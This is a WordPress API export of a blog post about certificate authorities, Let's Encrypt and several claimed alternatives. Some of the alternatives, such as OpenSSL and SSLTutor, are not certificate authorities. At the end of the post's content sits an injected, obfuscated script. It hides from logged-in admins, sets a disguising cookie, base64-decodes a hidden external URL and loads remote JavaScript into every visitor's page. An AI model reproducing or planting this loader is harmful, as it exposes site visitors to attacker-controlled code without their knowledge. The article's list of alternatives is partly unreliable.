{"id":1,"date":"2023-08-02T17:12:08","date_gmt":"2023-08-02T17:12:08","guid":{"rendered":"http:\/\/webtestinglink.com\/beta\/sourabhgupta\/?p=1"},"modified":"2025-10-18T21:50:09","modified_gmt":"2025-10-18T21:50:09","slug":"looking-at-letsencrypt-and-its-alternatives-in-2023","status":"publish","type":"post","link":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/looking-at-letsencrypt-and-its-alternatives-in-2023\/","title":{"rendered":"Looking at LetsEncrypt and its alternatives in 2023"},"content":{"rendered":"<h3>What is CA (Certificate authority)<\/h3>\n<p id=\"d68d\" class=\"pw-post-body-paragraph lj lk ev ll b lm ln lo lp lq lr ls lt lu lv lw lx ly lz ma mb mc md me mf mg eo bj\" data-selectable-paragraph=\"\">A certificate authority (CA) is trusted entity or organisation which issues digital SSL certificates for websites and other entities.<\/p>\n<p id=\"e93c\" class=\"pw-post-body-paragraph lj lk ev ll b lm mh lo lp lq mi ls lt lu mj lw lx ly mk ma mb mc ml me mf mg eo bj\" data-selectable-paragraph=\"\">These digital certificates are a trusted file or electronic password which proves the authenticity of a website, domain, server, or user through the use of cryptography and\u00a0<strong class=\"ll ew\">PKI<\/strong>\u00a0(public key infrastructure).<\/p>\n<blockquote class=\"mm mn mo\">\n<p id=\"0e87\" class=\"lj lk mp ll b lm mh lo lp lq mi ls lt mq mj lw lx mr mk ma mb ms ml me mf mg eo bj\" data-selectable-paragraph=\"\">A digital certificate provides the following details:<br \/>\n<strong class=\"ll ew\">Authentication<\/strong>, by serving as a credential to validate the identity of the entity that it is issued to.<br \/>\n<strong class=\"ll ew\">Encryption<\/strong>, for secure communication over insecure networks such as the Internet.<br \/>\n<strong class=\"ll ew\">Integrity<\/strong> of documents signed with the certificate so that they cannot be altered by a third party in transit.<\/p>\n<\/blockquote>\n<div class=\"eo ep eq er es\">\n<div class=\"ab ca\">\n<div class=\"ch bg dx dy dz ea\">\n<h3 id=\"cd23\" class=\"kl km ev be kn ko nb kq kr ks nc ku kv kw nd ky kz la ne lc ld le nf lg lh li bj\">What is LetsEncrypt ?<\/h3>\n<p id=\"6689\" class=\"pw-post-body-paragraph lj lk ev ll b lm ln lo lp lq lr ls lt lu lv lw lx ly lz ma mb mc md me mf mg eo bj\" data-selectable-paragraph=\"\">Let\u2019s Encrypt is a free, automated, and open certificate authority (CA), run for the public\u2019s benefit. It is a service provided by the\u00a0<a class=\"af ng\" href=\"https:\/\/www.abetterinternet.org\/\" target=\"_blank\" rel=\"noopener ugc nofollow\">Internet Security Research Group (ISRG)<\/a>. It provides X.509 certificates for Transport Layer Security (TLS) encryption. These are free certificates which means anyone who has a domain name can use Let\u2019sEncrypt to obtain a trusted certificate at zero cost.<\/p>\n<p id=\"78bc\" class=\"pw-post-body-paragraph lj lk ev ll b lm mh lo lp lq mi ls lt lu mj lw lx ly mk ma mb mc ml me mf mg eo bj\" data-selectable-paragraph=\"\"><strong class=\"ll ew\">LetsEncrypt provides two types of certificates:<\/strong><\/p>\n<ol class=\"\">\n<li id=\"2485\" class=\"lj lk ev ll b lm mh lo lp lq mi ls lt mq mj lw lx mr mk ma mb ms ml me mf mg nh ni nj bj\" data-selectable-paragraph=\"\">The standard single domain SSL<\/li>\n<li id=\"8352\" class=\"lj lk ev ll b lm nk lo lp lq nl ls lt mq nm lw lx mr nn ma mb ms no me mf mg nh ni nj bj\" data-selectable-paragraph=\"\">The\u00a0<a class=\"af ng\" href=\"https:\/\/www.siteground.com\/kb\/what-is-wildcard-ssl\/\" target=\"_blank\" rel=\"noopener ugc nofollow\">Wildcard SSL<\/a>, which covers not only a single domain, but all of its subdomains too.<\/li>\n<\/ol>\n<p id=\"8f07\" class=\"pw-post-body-paragraph lj lk ev ll b lm mh lo lp lq mi ls lt lu mj lw lx ly mk ma mb mc ml me mf mg eo bj\" data-selectable-paragraph=\"\">Let\u2019sEncrypt certificates come with a validity of 90 days.Let\u2019s Encrypt automatically renews certificates to reduce page errors.<\/p>\n<p id=\"fa53\" class=\"pw-post-body-paragraph lj lk ev ll b lm mh lo lp lq mi ls lt lu mj lw lx ly mk ma mb mc ml me mf mg eo bj\" data-selectable-paragraph=\"\">Let\u2019sEncrypt uses the\u00a0<a class=\"af ng\" href=\"https:\/\/ietf-wg-acme.github.io\/acme\/draft-ietf-acme-acme.html\" target=\"_blank\" rel=\"noopener ugc nofollow\">ACME (Automatic Certificate Management Environment )<\/a>\u00a0protocol to provide free TLS\/SSL certificates to any compatible client. The ACME (Automated Certificate Management Environment) protocol was originally developed by the Internet Security Research Group for its public CA, LetsEncrypt.<\/p>\n<p id=\"6cee\" class=\"pw-post-body-paragraph lj lk ev ll b lm mh lo lp lq mi ls lt lu mj lw lx ly mk ma mb mc ml me mf mg eo bj\" data-selectable-paragraph=\"\">In 2019, the IETF\u00a0<a class=\"af ng\" href=\"https:\/\/letsencrypt.org\/2019\/03\/11\/acme-protocol-ietf-standard.html\" target=\"_blank\" rel=\"noopener ugc nofollow\">standardized the ACME protocol<\/a>\u00a0in\u00a0<a class=\"af ng\" href=\"https:\/\/tools.ietf.org\/html\/rfc8555\" target=\"_blank\" rel=\"noopener ugc nofollow\">RFC8555<\/a>, and many clients have since developed support for the protocol. ACME v2 is not backwards compatible with v1, which will be\u00a0<a class=\"af ng\" href=\"https:\/\/community.letsencrypt.org\/t\/end-of-life-plan-for-acmev1\/88430\" target=\"_blank\" rel=\"noopener ugc nofollow\">deprecated entirely<\/a>\u00a0in June 2021.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<h3><strong class=\"al\" style=\"color: revert; font-size: revert;\">Possible alternatives to LetsEncrypt in 2023<\/strong><\/h3>\n<div class=\"eo ep eq er es\">\n<div class=\"ab ca\">\n<div class=\"ch bg dx dy dz ea\">\n<ul>\n<li id=\"d128\" class=\"lj lk ev ll b lm ln lo lp lq lr ls lt mq lv lw lx mr lz ma mb ms md me mf mg nh ni nj bj\" data-selectable-paragraph=\"\"><a class=\"af ng\" href=\"https:\/\/zerossl.com\/\" target=\"_blank\" rel=\"noopener ugc nofollow\"><strong class=\"ll ew\">ZeroSSL<\/strong><\/a><strong class=\"ll ew\">:\u00a0<\/strong>ZeroSSL is a one-stop solution for SSL certificate creation and management, allowing users to create website security certificates issued by ZeroSSL either using a fast and straightforward user interface, using ACME integrations, or using a full-fledged SSL REST API.<\/li>\n<li id=\"0475\" class=\"lj lk ev ll b lm nk lo lp lq nl ls lt mq nm lw lx mr nn ma mb ms no me mf mg nh ni nj bj\" data-selectable-paragraph=\"\"><a class=\"af ng\" href=\"https:\/\/www.openssl.org\/\" target=\"_blank\" rel=\"noopener ugc nofollow\"><strong class=\"ll ew\">OpenSSL:\u00a0<\/strong><\/a>The OpenSSL Project develops and maintains the OpenSSL software \u2014 a robust, commercial-grade, full-featured toolkit for general-purpose cryptography and secure communication<\/li>\n<li id=\"a2d1\" class=\"lj lk ev ll b lm nk lo lp lq nl ls lt mq nm lw lx mr nn ma mb ms no me mf mg nh ni nj bj\" data-selectable-paragraph=\"\"><a class=\"af ng\" href=\"https:\/\/docs.aws.amazon.com\/acm\/index.html\" target=\"_blank\" rel=\"noopener ugc nofollow\"><strong class=\"ll ew\">AWS certificate manager:\u00a0<\/strong><\/a>AWS Certificate Manager (ACM) handles the complexity of creating, storing, and renewing public and private SSL\/TLS X.509 certificates and keys that protect your AWS websites and applications. You can provide certificates for your\u00a0<a class=\"af ng\" href=\"https:\/\/docs.aws.amazon.com\/acm\/latest\/userguide\/acm-services.html\" target=\"_blank\" rel=\"noopener ugc nofollow\">integrated AWS services<\/a>\u00a0either by issuing them directly with ACM or by\u00a0<a class=\"af ng\" href=\"https:\/\/docs.aws.amazon.com\/acm\/latest\/userguide\/import-certificate.html\" target=\"_blank\" rel=\"noopener ugc nofollow\">importing<\/a> third-party certificates into the ACM management system.<\/li>\n<li id=\"32f8\" class=\"lj lk ev ll b lm nk lo lp lq nl ls lt mq nm lw lx mr nn ma mb ms no me mf mg nh ni nj bj\" data-selectable-paragraph=\"\"><a class=\"af ng\" href=\"https:\/\/www.geotrust.com\/\" target=\"_blank\" rel=\"noopener ugc nofollow\"><strong class=\"ll ew\">GeoTrust SSL<\/strong><\/a><strong class=\"ll ew\">:<\/strong> GeoTrust is a globally-recognized provider of TLS\/SSL certificates \u2014 now powered by DigiCert, the industry-leader in high-assurance website security.<\/li>\n<li id=\"efc0\" class=\"lj lk ev ll b lm nk lo lp lq nl ls lt mq nm lw lx mr nn ma mb ms no me mf mg nh ni nj bj\" data-selectable-paragraph=\"\"><a class=\"af ng\" href=\"http:\/\/www.cacert.org\/\" target=\"_blank\" rel=\"noopener ugc nofollow\"><strong class=\"ll ew\">CAcert<\/strong><\/a><strong class=\"ll ew\">\u00a0:\u00a0<\/strong>CAcert.org is a community-driven Certificate Authority that issues certificates to the public at large for free. CAcert\u2019s goal is to promote awareness and education on computer security through the use of encryption, specifically by providing cryptographic certificates. These certificates can be used to digitally sign and encrypt email, authenticate and authorize users connecting to websites and secure data transmission over the internet.<\/li>\n<li id=\"adb9\" class=\"lj lk ev ll b lm nk lo lp lq nl ls lt mq nm lw lx mr nn ma mb ms no me mf mg nh ni nj bj\" data-selectable-paragraph=\"\"><a class=\"af ng\" href=\"https:\/\/ssltutor.com\/\" target=\"_blank\" rel=\"noopener ugc nofollow\"><strong class=\"ll ew\">SSLTutor<\/strong><\/a><strong class=\"ll ew\">:\u00a0<\/strong>SSLTutor is a platform that guides user for SSL Installation Process, SSL Errors Fixing Resources, SSL Tools, SSL Types, SSL Providers, SSL Comparison and more.<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>What is CA (Certificate authority) A certificate authority (CA) is trusted entity or organisation which issues digital SSL certificates for websites and other entities. These digital certificates are a trusted file or electronic password which proves the authenticity of a website, domain, server, or user through the use of cryptography and\u00a0PKI\u00a0(public key infrastructure). A digital [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":42,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"acf":[],"_links":{"self":[{"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/posts\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"count":6,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"predecessor-version":[{"id":234,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/posts\/1\/revisions\/234"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/media\/42"}],"wp:attachment":[{"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/webtestinglink.com\/beta\/sourabhgupta\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}